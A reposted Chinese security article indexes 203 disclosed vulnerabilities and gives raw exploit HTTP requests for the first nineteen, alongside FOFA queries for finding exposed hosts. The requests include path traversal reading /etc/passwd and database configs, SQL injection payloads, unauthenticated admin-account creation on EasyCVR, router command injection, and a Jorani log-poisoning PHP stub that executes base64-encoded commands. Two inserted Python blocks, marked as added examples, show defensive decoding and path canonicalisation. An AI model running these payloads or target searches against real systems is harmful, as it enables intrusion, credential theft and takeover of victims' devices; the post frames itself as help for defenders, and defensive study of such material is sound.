Collection of publicly disclosed Internet vulnerabilities 202309-202406 (repost)

Posted 2024-6-5 14:31:29
Collection of publicly disclosed Internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, by 网络安全新视界.

Purpose: exploitation of Nday vulnerabilities accounts for a large share of offensive activity, so this article is meant to help defenders. Blue teams can use the list below to check their own assets for exposure.

Sources: the article covers 203 POCs for high-impact vulnerabilities published in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: every vulnerability here is already public. For patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few overly long POCs are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team via the account backend and the content will be removed.

Statement

To keep things simple and easy to browse there is no "reply to see the full list" gate. This article is the complete list as it stands; when using it, press F12 and search for keywords.

Bookmark it if you find it useful, or follow the public account (网络安全新视界).
Table of contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. jshERP (华夏ERP) sensitive information disclosure
15. jshERP (华夏ERP) getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QAX (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QAX 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent lecture-capture system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 PACS (medical imaging archive and communication system) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace the password value with the MD5 of the password you want to set.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin first, then send the request below with the sysauth cookie obtained from that login. The %s values are placeholders left in the published POC; the injected command is the "id" after the semicolon in wifiRebootrange.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The keyword value is the double URL-encoding of the statement below (the leading 1 is literal):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
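
The double URL-encoding in entry 9, as an added example that is not part of the original post: it rebuilds the keyword value above from the plain SQL statement, shows that a filter which decodes only once never sees the quote, and normalises the value the way a WAF or input validator should before pattern matching. The SQLI_MARKERS regex is an illustrative assumption, not a complete SQL injection signature.

```python
# Added example (not part of the original post): the double URL-encoding used by
# the DocCMS keyword POC above, and the normalisation a filter needs to see through it.
import re
from urllib.parse import unquote

# The SQL statement given in the POC above.
PAYLOAD = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"

# The keyword value from the POC request above, split by SQL token for readability.
# The leading "1" is literal; everything after it is PAYLOAD encoded twice.
ENCODED_FROM_PAGE = (
    "1"
    "%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30"                                      # ' and<space>
    "%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34"                    # (extract
    "%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38"                                      # value(
    "%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38"           # 1,concat(
    "%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38"                                      # 0x7e,(
    "%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30"                             # select<space>
    "%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39"                                      # user()
    "%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33"  # ),0x7e)))#
)


def urlencode_all(text: str) -> str:
    """Percent-encode every byte, letters and digits included, with lowercase hex.
    That is what the POC's encoder did (a standard encoder would leave 'and' alone)."""
    return "".join(f"%{b:02x}" for b in text.encode("utf-8"))


def double_urlencode(text: str) -> str:
    return urlencode_all(urlencode_all(text))


def one_pass_decode(value: str) -> str:
    """What a filter that decodes exactly once sees: still only %XX tokens, no quote."""
    return unquote(value)


def normalise(value: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing (bounded, so hostile input cannot loop us)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_rounds(value: str, max_rounds: int = 5) -> int:
    """Number of decode passes needed to reach the fixed point; 2 for this POC."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return rounds


# Illustrative markers only (assumption), enough to catch the statement above.
SQLI_MARKERS = re.compile(r"extractvalue|updatexml|select\s+user\(\)|concat\s*\(|'\s*(and|or)\s", re.I)


def looks_like_sqli(raw_param: str) -> bool:
    """Inspect the fully normalised value, never the raw or once-decoded one."""
    return SQLI_MARKERS.search(normalise(raw_param)) is not None


if __name__ == "__main__":
    print(decode_rounds(ENCODED_FROM_PAGE), normalise(ENCODED_FROM_PAGE))
```

The point for defenders is decode_rounds: a value that needs two decode passes to reach a fixed point is itself a strong signal, independent of what it decodes to.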

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST a login attempt. The language parameter traverses to the application log directory and the login field carries a PHP stub, so the stub lands in the log file; the stub runs whatever base64-encoded command arrives in the K1SYJPMHLU4Z request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the request below to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command (it decodes to echo ---------;id 2>&1;echo ---------;), and the log page name log-2023-10-24 matches the date in the step 1 response.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. jshERP (华夏ERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. jshERP (华夏ERP) getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

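Why the two jshERP requests in entries 14 and 15 reach getAllList, and why the Casdoor and Sangfor paths in entries 2 and 6 reach /etc/passwd, as an added example that is not jshERP's or any vendor's code: the access check is evaluated on the raw request path while the dispatcher routes on the resolved one, so a matrix parameter (;.ico) or a dot-segment (a.ico/..) changes what the check sees without changing what gets served. Canonicalise first and decide on the canonical path; the same function flags the patterns in access logs. PROTECTED_PREFIXES and SAMPLE_LOG are constructed for the demo.

```python
# Added example (not jshERP's code): canonicalise a request path the way the container
# will before routing, then apply the access rule to the canonical form.
import posixpath
import re
from urllib.parse import unquote

# Constructed for the demo: path prefixes that should require a session.
PROTECTED_PREFIXES = ("/jshERP-boot/user/", "/api/v1/")

LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed access-log lines (not real traffic); lines 1, 2 and 4 mirror entries 14, 15 and 2.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jun/2024:10:00:01 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 5120
10.0.0.5 - - [02/Jun/2024:10:00:02 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 5120
10.0.0.7 - - [02/Jun/2024:10:00:03 +0800] "GET /jshERP-boot/static/logo.ico HTTP/1.1" 200 812
10.0.0.9 - - [02/Jun/2024:10:00:04 +0800] "GET /static/%2e%2e/../../../etc/passwd HTTP/1.1" 200 1441
"""


def canonical_path(raw: str) -> str:
    """Drop the query, percent-decode, strip matrix parameters (';x' in any segment),
    resolve '.' and '..', collapse repeated slashes. Works for file parameters too."""
    path = unquote(raw.split("?", 1)[0]) or "/"
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    norm = posixpath.normpath("/".join(segments))
    return norm if norm.startswith("/") else "/" + norm


def is_protected(raw: str) -> bool:
    """Decide on the canonical path; deciding on the raw one is the bug the POCs exploit."""
    return canonical_path(raw).startswith(PROTECTED_PREFIXES)


def bypass_indicators(raw: str) -> list:
    """Constructs that make the raw path differ from what the container routes."""
    path = unquote(raw.split("?", 1)[0])
    reasons = []
    if ";" in path:
        reasons.append("matrix-parameter")
    if re.search(r"(^|/)\.\.?(/|$)", path):
        reasons.append("dot-segment")
    if "//" in path:
        reasons.append("double-slash")
    if re.search(r"%2[eEfF]|%5[cC]", raw):
        reasons.append("encoded-separator")
    return reasons


def suspicious_requests(log_text: str) -> list:
    """Scan access-log lines; report the raw target, its canonical form, the indicators,
    and whether the canonical path lands on a protected prefix."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.search(line)
        if not m:
            continue
        target = m.group("target")
        reasons = bypass_indicators(target)
        if reasons:
            hits.append({
                "target": target,
                "canonical": canonical_path(target),
                "reasons": reasons,
                "protected": is_protected(target),
                "status": m.group("status"),
            })
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit whose canonical path is protected and whose status is 200 is the case to escalate: the filter let the request through and the handler answered.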
16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC makes the database compute the MD5 of 1234 with HASHBYTES; that hash showing up in the response confirms the injection.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

